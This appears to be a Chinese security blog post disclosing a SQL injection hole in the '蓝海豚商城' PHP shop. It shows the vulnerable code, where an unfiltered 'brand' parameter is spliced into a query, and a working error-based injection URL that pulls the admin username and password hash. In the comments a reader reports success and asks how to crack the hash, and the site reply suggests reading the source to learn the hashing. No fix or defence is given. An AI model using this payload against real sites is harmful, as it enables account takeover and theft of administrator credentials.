看代码

Index.class.php:

…若干………
function search_action()
        {
       
                $keyword = $_REQUEST['keyword'];
                if(empty($keyword))
                {
                        exit;
                }
………若干…
                if($_REQUEST['brand'])
                {
                        $container.="  AND brand = ".$_REQUEST['brand']; //你懂的
                        $ext['brand'] = $_REQUEST['brand'];
                }       
……若干……

test

蓝海豚商城导航注入漏洞

exp:

http://127.0.0.1/index.php?act=search&keyword=1&brand=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,phpup_user.username,0x27,0x7e,phpup_user.pwd)%20from%20phpup_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1/*

留言评论(旧系统):

【匿名者】 @ 2012-03-05 03:09:32

http://lcx.cc/?FoxNews=1962.html# 看了你这个,测试成功,但是md5 怎么是21位的?如何破解?谢谢 我的邮箱 shell@wow.com

本站回复:

这个不太清楚,这个当时是 Cond0r 写的,时间过得久了我也记不清了,目测是参数没任何过滤,可以获取管理账号密码,至于密码为啥是21位,可能是变异的MD5这类的,最简单的方法,你下载一套这套程序,看看源码,看加密算法怎么写的,就知道了。